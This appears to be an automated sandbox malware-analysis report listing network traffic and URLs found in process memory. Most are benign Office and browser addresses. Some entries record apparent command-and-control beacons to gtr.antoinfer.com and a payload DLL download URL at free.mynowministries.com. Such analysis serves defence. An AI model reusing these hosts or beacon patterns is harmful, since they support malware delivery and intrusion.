                  Source: global trafficHTTP traffic detected: GET /h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIHQG/CB4JNANcQf7aA7/T_2FdtzxTEW5qEGgXi5de/wQDU_2FVQ9AqPhgZ/QBiqWLaZem_2BhU/Ub_2Bbrgr7V1ABDC_2/FRiGY94s4/Mw6BG5UCBUeOPfAvsqhw/LTDXh6l0kPjcKC2fY3f/eXzxQUf3im0jBAcOxzjmlM/t_2BlYZFFpOnU/rPHW4IFe/pXsS9omB7zF_2B_2BEp_2BV/Ya9nAT6p4X/2ixawH6C4M4LLI7hR/_2BGNe0TQDy_/2FBKn745niy/_2BRADxlO6wxP1/zz_2BWqAzRaI/gWg HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: msapplication.xml0.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                  Source: msapplication.xml0.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                  Source: msapplication.xml5.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                  Source: msapplication.xml5.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                  Source: msapplication.xml7.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                  Source: msapplication.xml7.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                  Source: unknownDNS traffic detected: queries for: free.mynowministries.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 08 Jul 2021 13:46:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                  Source: powershell.exe, 00000027.00000002.587349219.000002B5AD3CF000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: {5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF99BD870E81A4914B.TMP.23.drString found in binary or memory: http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpString found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/
                  Source: {7879BAAA-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF4AB9BBFB5CFFE773.TMP.28.drString found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjg
                  Source: {7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat.28.drString found in binary or memory: http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpString found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare
                  Source: {7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat.28.drString found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH
                  Source: {7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DFA7B5BF1FB774EA36.TMP.28.drString found in binary or memory: http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk
                  Source: {7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF436C4ACF406520B7.TMP.28.drString found in binary or memory: http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                  Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                  Source: powershell.exe, 00000025.00000002.587720869.0000028658461000.00000004.00000001.sdmp, powershell.exe, 00000027.00000002.589665519.000002B5AD541000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                  Source: msapplication.xml.23.drString found in binary or memory: http://www.amazon.com/
                  Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: msapplication.xml1.23.drString found in binary or memory: http://www.google.com/
                  Source: msapplication.xml2.23.drString found in binary or memory: http://www.live.com/
                  Source: msapplication.xml3.23.drString found in binary or memory: http://www.nytimes.com/
                  Source: msapplication.xml4.23.drString found in binary or memory: http://www.reddit.com/
                  Source: msapplication.xml5.23.drString found in binary or memory: http://www.twitter.com/
                  Source: msapplication.xml6.23.drString found in binary or memory: http://www.wikipedia.com/
                  Source: msapplication.xml7.23.drString found in binary or memory: http://www.youtube.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.aadrm.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.cortana.ai
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.diagnostics.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.microsoftstream.com/api/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.office.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.onedrive.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://apis.live.net/v5.0/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://augloop.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://augloop.office.com/v2
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://cdn.entity.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://clients.config.office.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://config.edge.skype.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://cortana.ai
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://cortana.ai/api
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://cr.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://dataservice.o365filtering.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://dataservice.o365filtering.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://dev.cortana.ai
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://devnull.onenote.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://directory.services.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                  Source: close.xmlString found in binary or memory: https://free.mynowministries.com/app.dll
                  Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://graph.ppe.windows.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://graph.ppe.windows.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://graph.windows.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://graph.windows.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://incidents.diagnostics.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://lifecycle.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://login.microsoftonline.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://login.windows.local
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://management.azure.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://management.azure.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://messaging.office.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://ncus.contentsync.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://ncus.pagecontentsync.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://officeapps.live.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://onedrive.live.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://onedrive.live.com/embed?
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://osi.office.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://outlook.office.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://outlook.office365.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://pages.store.office.com/review/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
